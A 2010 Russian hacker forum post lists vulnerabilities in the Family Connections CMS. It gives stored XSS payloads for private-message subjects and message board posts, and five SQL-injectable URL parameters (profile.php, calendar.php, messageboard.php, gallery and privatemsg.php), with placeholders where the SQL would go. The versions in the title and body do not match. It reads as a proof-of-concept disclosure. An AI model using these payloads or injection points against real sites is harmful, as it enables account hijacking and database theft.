Тема: Family Connections 1.1.2 Multiply Vulns
Показать сообщение отдельно

  #2  
Старый 27.01.2010, 20:15
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию
Family Connections (FCMS)
site : www.familycms.com/
version cms : 2.1.2 (FCMS 2.1.2)
download : www.familycms.com/downloads/index.php

Active XSS
1. (тело письма) -- отправляем письмо пользователю с заголовком ( "><script>alert()</script> )
2.messageboard.php -- в теме отправляем сообщение --- ("><script>alert(/xss/);</script>) условие (кто будет отвечать после сообщения со скриптом или просто "Reply" попадется на xss)

SQL Injection
1. -- profile.php
Код:
http://localhost/profile.php?member=[...][sql]
2. -- calendar.php
Код:
http://localhost/calendar.php?entry=[...][sql]
3. -- messageboard.php
Код:
http://localhost/messageboard.php?thread=1[...][sql]
4. -- index.php
Код:
http://localhost/gallery/index.php?uid=[..]&cid=[..]&pid=[..]sql
5. -- privatemsg.php
Код:
http://localhost/privatemsg.php?pm=[..][sql]
 
Ответить с цитированием